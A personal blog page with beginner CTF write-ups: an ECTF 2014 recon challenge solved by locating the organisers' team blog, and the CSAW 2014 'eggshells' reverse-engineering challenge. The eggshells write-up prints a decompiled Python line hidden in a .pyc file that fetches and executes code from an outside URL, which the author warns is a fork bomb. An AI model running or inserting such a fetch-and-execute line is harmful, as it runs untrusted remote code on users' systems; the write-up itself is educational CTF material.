CSAW-CTF – Tummala Dhanvi's Blog

Meet The Team – Ectf 2014 Recon-80

I have attached the screen-shot of the question 🙂 of Recon-80

The question is very simple but getting the blog of the team becomes hard because ECTF is organised for the first time.

The ECTF organizers doesn’t have a good blog which contains all the write up’s that they have solved, it seems like they have created blog just for the case of the challenge as the blog contains only one post which makes it difficult for the search engines to get the get that link (if any of you googled for the blog and did not get the link don’t blame google as it is doing a great job)

The name of team which is organising the ctf is NIA (no internet access). They have mentioned it in the clue also but you will never get to know that it is the name of the team for more details visit this link http://nia-ctf.github.io/

Bingo you got the blog link in the ctftime.org at this address https://ctftime.org/team/8096 and you get the link as http://nia-ctf.github.io/ so you got the flag, there was some small confusion regarding the format of the flag but the admin would have helped you at that time 🙂

flag:http://nia-ctf.github.io/

CSAW CTF Quals 2014 – eggshells (100) writeup

Here is the link of the zip file and the question http://shell-storm.org/repo/CTF/CSAW-2014/Reverse_Engineering/eggshells-100/

The question is :

I trust people on the internet all the time, do you?

Written by ColdHeat

The question doesn’t give you any kind of hint when you first try to solve it but when you finally see the result it makes some sense to you 🙂

First when you unzip the file you get two directories named as “eggshells-master” and “__MACOSX” here are the screenshots of the directories of the both the folders.

The source code of all other files except the utilys.pyc file which is a python compiled file you can decompile it using this application (https://sourceforge.net/projects/easypythondecompiler/ ) which is based on uncompyle2 (https://github.com/Mysterie/uncompyle2) or what ever which can decompile python 2.7 file 🙂

If you decompile the file here is the code that you get:

[code language=”python”]
exec __import__(‘urllib2’).urlopen(‘http://kchung.co/lol.py’).read()
[/code]

Don’t be in a hurry and just run the code as it is a fork bomb 🙂

here you get the flag : flag{trust_is_risky}

Now you get why the question is like that 🙂

CSAW CTF 2014

I have participated in my first ctf csaw 2014. Even though I could not solve a good amount of questions.

Here is the link of the website https://ctf.isis.poly.edu/. There is a good archive of the problems in the shell-storm website here is the link http://shell-storm.org/repo/CTF/CSAW-2014/.

You can expect me to writing the writeups for the questions specifically reverse engineering